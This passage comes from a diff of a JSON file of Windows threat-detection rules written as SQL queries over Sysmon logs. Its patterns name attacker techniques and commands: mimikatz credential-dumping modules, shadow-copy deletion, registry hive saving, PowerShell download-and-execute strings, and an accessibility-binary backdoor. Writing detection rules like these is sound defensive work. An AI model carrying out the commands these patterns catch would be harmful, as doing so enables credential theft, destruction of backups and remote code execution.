'%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" + "attack.resource_development", + "attack.t1588.002" ], - "filename": "proc_creation_win_powershell_webclient_casing.yml" - }, - { - "title": "Suspicious SYSTEM User Process Creation", - "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", - "status": "test", - "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", - "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", "falsepositives": [ - "Administrative activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (Image LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_system_user_anomaly.yml" + "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" }, { - "title": "LockerGoga Ransomware Activity", - "id": "74db3488-fd28-480a-95aa-b7af626de068", - "status": "stable", - "description": "Detects LockerGoga ransomware activity via specific command line.", - "author": "Vasiliy Burov, oscd.community", + "title": "Potential COM Object Hijacking Via TreatAs Subkey - Registry", + "id": "9b0f8a61-91b2-464f-aceb-0527e0a45020", + "status": "experimental", + "description": "Detects COM object hijacking via TreatAs subkey", + "author": "Kutepov Anton, oscd.community", "tags": [ - "attack.impact", - "attack.t1486" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unlikely" + "Maybe some system utilities in rare cases use linking keys for backward compatibility" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%HKU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Classes\\\\CLSID\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\TreatAs%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" + "filename": "registry_add_persistence_com_key_linking.yml" }, { - "title": "Xwizard DLL Sideloading", - "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "title": "Potential Ursnif Malware Activity - Registry", + "id": "21f17060-b282-4249-ade0-589ea3591558", "status": "test", - "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects registry keys related to Ursnif malware.", + "author": "megan201296", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.execution", + "attack.t1112" ], "falsepositives": [ - "Windows installed on non-C drive" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" + "filename": "registry_add_malware_ursnif.yml" }, { - "title": "Suspicious Add Scheduled Task Parent", - "id": "9494479d-d994-40bf-a8b1-eea890237021", + "title": "Potential Persistence Via New AMSI Providers - Registry", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", "status": "experimental", - "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.persistence" ], "falsepositives": [ - "Software installers that run from temporary folders and also install scheduled tasks" + "Legitimate security products adding their own AMSI providers. Filter these according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%unattended.ini%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_parent.yml" + "filename": "registry_add_persistence_amsi_providers.yml" }, { - "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", - "id": "e9b61244-893f-427c-b287-3e708f321c6b", + "title": "Potential NetWire RAT Activity - Registry", + "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", "status": "experimental", - "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", - "author": "frack113", + "description": "Detects registry keys related to NetWire RAT", + "author": "Christopher Peacock", "tags": [ - "attack.credential_access", - "attack.t1546.008" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" + "filename": "registry_add_malware_netwire.yml" }, { - "title": "CreateDump Process Dump", - "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", + "title": "Potential Persistence Via Disk Cleanup Handler - Registry", + "id": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", "status": "experimental", - "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. It displays the dialog box […]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.persistence" ], "falsepositives": [ - "Command lines that use the same flags" + "Legitimate new entry added by windows" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\Active Setup Temp Folders' ESCAPE '\\' OR TargetObject LIKE '%\\\\BranchCache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Content Indexer Cleaner' ESCAPE '\\' OR TargetObject LIKE '%\\\\D3D Shader Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Delivery Optimization Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Device Driver Packages' ESCAPE '\\' OR TargetObject LIKE '%\\\\Diagnostic Data Viewer database files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Downloaded Program Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\DownloadsFolder' ESCAPE '\\' OR TargetObject LIKE '%\\\\Feedback Hub Archive log files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Internet Cache Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Language Pack' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft Office Temp Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Offline Pages Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Old ChkDsk Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Previous Installations' ESCAPE '\\' OR TargetObject LIKE '%\\\\Recycle Bin' ESCAPE '\\' OR TargetObject LIKE '%\\\\RetailDemo Offline Content' ESCAPE '\\' OR TargetObject LIKE '%\\\\Setup Log Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error memory dump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error minidump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Setup Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Sync Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Thumbnail Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Update Cleanup' ESCAPE '\\' OR TargetObject LIKE '%\\\\Upgrade Discarded Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\User file versions' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Defender' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Error Reporting Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows ESD installation files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Upgrade Log Files' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_createdump.yml" + "filename": "registry_add_persistence_disk_cleanup_handler_entry.yml" }, { - "title": "Exports Registry Key To a File", - "id": "f0e53e89-8d22-46ea-9db5-9d4796ee2f8a", - "status": "test", - "description": "Detects the export of the target Registry key to a file.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification", + "id": "480421f9-417f-4d3b-9552-fd2728443ec8", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.exfiltration", - "attack.t1012" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate export of keys" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 